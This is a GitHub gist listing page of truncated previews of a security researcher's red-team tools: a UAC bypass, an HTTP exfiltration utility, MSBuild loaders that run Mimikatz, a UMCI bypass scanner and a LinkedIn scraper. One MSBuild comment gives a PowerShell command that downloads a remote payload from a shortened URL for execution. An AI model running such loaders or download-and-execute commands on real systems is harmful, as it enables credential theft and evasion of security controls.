Leo Loobeek leoloobeek
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # first: mkdir user && cd user && cp /path/to/get_gists.py . | |
| # python3 get_gists.py user | |
| import requests | |
| import sys | |
| from subprocess import call | |
| user = sys.argv[1] | |
| r = requests.get('https://api.github.com/users/{0}/gists'.format(user)) |
leoloobeek
/ cors-example.js
Last active
May 1, 2017 15:00
Simple Curl request to check for CORS misconfiguration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Evan Johnson - Misconfigured CORS and why web appsec is not getting easier - AppSecUSA 2016 | |
| // Stolen from presentation above for quick reference | |
| //curl https://site.com -H "Origin: https://test.com" -I | grep "Access-Control-Allow" | |
| $.ajax({ | |
| url: "https://site.com/some/url" | |
| success: function( data ) { | |
| document.write("Key: " data['SOME_VAR']); |
leoloobeek
/ EventVwrBypass.cs
Last active
June 6, 2023 08:50
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // httpxfil | |
| // Leo Loobeek 2017 | |
| // | |
| // PowerShell code taken from | |
| // https://github.com/EmpireProject/Empire | |
| // | |
| // Exfiltrate a file by encrypting and | |
| // sending via HTTP/S. This was written |
leoloobeek
/ rc4.vbs
Last active
June 6, 2023 08:44
In case you ever need VBS, RC4, and have base64 encrypted bytes. I'm probably the only person who did.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'https://bytes.com/topic/access/insights/906671-rc4-encryption-algorithm-vba-vbscript | |
| ' Note: There are known weaknesses to RC4 and should not be relied on | |
| Function RC4(byteMessage, strKey) | |
| Dim kLen, x, y, i, j, temp | |
| Dim s(256), k(256) | |
| For a = 0 To 255 | |
| s(a) = a | |
| k(a) = 0 | |
| Next | |
| klen = Len(strKey) |
leoloobeek
/ msbuilder.xml
Created
July 24, 2017 13:15
MSBuild Execute Assembly From Environment Variable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml --> | |
| <!-- Populate the Env Var like this or many other ways: --> | |
| <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') --> | |
| <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered --> | |
| <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> |
leoloobeek
/ katz.xml
Created
July 27, 2017 22:54
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
| <Target Name="Hello"> | |
| <SharpLauncher > | |
| </SharpLauncher> | |
| </Target> | |
| <UsingTask | |
| TaskName="SharpLauncher" | |
| TaskFactory="CodeTaskFactory" |
leoloobeek
/ netkatz.cs
Last active
September 19, 2023 16:24
Downloads and Executes Mimikatz In Memory From GitHub
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
leoloobeek
/ LoadMethodScanner.ps1
Created
July 28, 2017 02:48
— forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Matthew Graeber (@mattifestation) | |
| # Load dnlib with Add-Type first | |
| # dnlib can be obtained here: https://github.com/0xd4d/dnlib | |
| # Example: ls C:\ -Recurse | Get-AssemblyLoadReference | |
| filter Get-AssemblyLoadReference { | |
| param ( | |
| [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] | |
| [Alias('FullName')] | |
| [String] | |
| [ValidateNotNullOrEmpty()] |
leoloobeek
/ LinkedInScript.js
Created
August 24, 2017 15:16
https://github.com/rj4yb3/misc/blob/master/LinkedInScrape.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ---PLEASE NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY--- | |
| Script to scrape linkedin contacts for a certain company or search | |
| Authors - Erkin Djindjiev (@SeaErkin) | |
| Ryan Bradbury (@rj4yb3) | |
| Instructions - | |
| 1) navigate the first page of contacts | |
| 2) open your web browser developer tools | |
| 3) modify the pageLimit variable to fit the # of pages you'd like to scrape |
OlderNewer